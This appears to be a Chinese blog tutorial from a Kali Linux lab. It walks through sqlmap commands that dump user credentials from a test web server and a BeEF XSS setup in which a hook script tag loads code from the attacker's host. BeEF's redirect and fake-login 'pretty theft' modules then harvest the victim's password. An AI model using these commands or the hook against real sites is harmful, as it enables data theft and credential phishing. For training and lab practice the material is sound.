目錄

一、實驗

1.環(huán)境

2.Kali Linux 進行SQL注入

3.Kali Linux 進行XSS漏洞利用

二、問題

1.XSS分類

2.如何修改beef-xss的密碼

3.beef-xss 服務如何管理

4.運行beef報錯

5.beef 命令的顏色有哪些區(qū)別

6.owasp-top-10 有哪些變化

一、實驗

1.環(huán)境

（1）主機

表1? 主機

（2）查看Kali Linux (2022.4)系統(tǒng)版本

cat /etc/os-release

（3）?查看Kali Linux (2022.4)系統(tǒng)IP地址

ip addr | grep 154

（4）Windows 查看IP地址

ipconfig

（5）Kali主機 ping?Windows主機

ping  192.168.204.10

2.Kali Linux 進行SQL注入

(1) LAMP(LNMP)平臺

選擇Windows版本

https://www.xp.cn/download.html

（2）sqlmap查閱

https://github.com/sqlmapproject/sqlmap

（3）獲取服務器信息

包括操作系統(tǒng)、數(shù)據(jù)庫、 web 容器、后端語?

sqlmap -u http://192.168.204.10/news/list.php?id=46

（4）獲取數(shù)據(jù)名稱列表

--thread 10? 線程數(shù)設置為10

sqlmap -u http://192.168.204.10/news/show.php?id=46 --thread 10 -dbs

（5）獲取當前數(shù)據(jù)庫名稱

sqlmap -u http://192.168.204.10/news/show.php?id=46 --current-db

（6）獲取當前數(shù)據(jù)庫中所有表的名稱

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news --tables

（7）獲取當前數(shù)據(jù)庫指定的表的字段名

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news -T news_users --columns

（8）獲取指定庫指定表指定字段的值

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news -T news_users -C username,password --dump

3.Kali Linux 進行XSS漏洞利用

（1）漏洞測試平臺

選擇Windows版本

https://github.com/zhuifengshaonianhanlu/pikachu

（2）kali 系統(tǒng)更新

sudo apt-get update

（3）安裝ruby

apt-get install ruby

（4）安裝beef

apt-get install beef-xss 

（5）啟動beef-xss

┌──(root?kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:

┌──(root?kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - beef-xss
     Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; preset: disabled)
     Active: active (running) since Wed 2024-03-27 10:57:29 CST; 5s ago
   Main PID: 26104 (ruby)
      Tasks: 4 (limit: 2248)
     Memory: 92.8M
        CPU: 3.246s
     CGroup: /system.slice/beef-xss.service
             └─26104 ruby /usr/share/beef-xss/beef

3月 27 10:57:34 kali beef[26104]: == 24 CreateAutoloader: migrated (0.0013s) ====================================
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrating ============================================
3月 27 10:57:34 kali beef[26104]: -- create_table(:xssraysscans)
3月 27 10:57:34 kali beef[26104]:    -> 0.0016s
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrated (0.0016s) ===================================
3月 27 10:57:34 kali beef[26104]: [10:57:33][*] BeEF is loading. Wait a few seconds...
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

（6）瀏覽器登錄

http://127.0.0.1:3000/ui/authentication

(7) 輸入賬號密碼

賬號輸?beef，密碼輸?123456

進入系統(tǒng)

(8) Windows 主機設置鉤子

 <script src="http://192.168.204.154:3000/hook.js"></script>

（9）beef獲取目標主機

（10）查看模塊

（11）選擇重定向

執(zhí)行 (選擇Execute)

(12) Windows 主機頁面重定向

（13）選擇pretty theft

?執(zhí)行 (選擇Execute)

（14）Windows主機彈出登錄界面

（15）beef獲取賬號及密碼

二、問題

1.XSS分類

（1）類別

1）反射型XSS

2）持久型XSS
 
3）DOM型XSS

2.如何修改beef-xss的密碼

（1）修改

vim /etc/beef-xss/config.yaml

(第7、8?)

3.beef-xss 服務如何管理

（1）開啟服務

1）第一種方式
任意目錄，直接輸入命令：beef-xss 打開 ，過5秒左右，然后它自動會打開命令行和瀏覽器beef的登錄框

2）第二種方式
進入/usr/share/beef-xss/，輸入命令：./beef-xss 打開 ，然后手動打開瀏覽器鏈接

（2）服務管理

1）開啟beef服務
systemctl start beef-xss.service      

2）關閉beef服務
systemctl stop beef-xss.service        

3）重啟beef服務
systemctl restart beef-xss.service  

4.運行beef報錯

（1）報錯

（2）原因分析

需要管理員操作。

（3）解決方法

切換為管理員操作。

5.beef 命令的顏色有哪些區(qū)別

（1）區(qū)別

1）綠?
命令模塊可以在?標瀏覽器上運?，且?戶不會感到任何異常

2）灰?
命令模塊尚未針對???此?標進?驗證，不知道是否可運?

3）橙?
命令模塊可以在?標瀏覽器上運?，但是?戶可能會感到異常(例如彈窗、提示、跳轉等)

4）紅?
命令模塊不適?于此?標

6.owasp-top-10 有哪些變化

（1）官網(wǎng)

http://www.owasp.org.cn/OWASP-CHINA/owasp-project/2021-owasp-top-10/

（2）變化

最近2次的變化

文章來源地址http://www.zghlxwxcb.cn/news/detail-858541.html

到了這里，關于網(wǎng)絡安全：Kali Linux 進行SQL注入與XSS漏洞利用的文章就介紹完了。如果您還想了解更多內容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章，希望大家以后多多支持TOY模板網(wǎng)！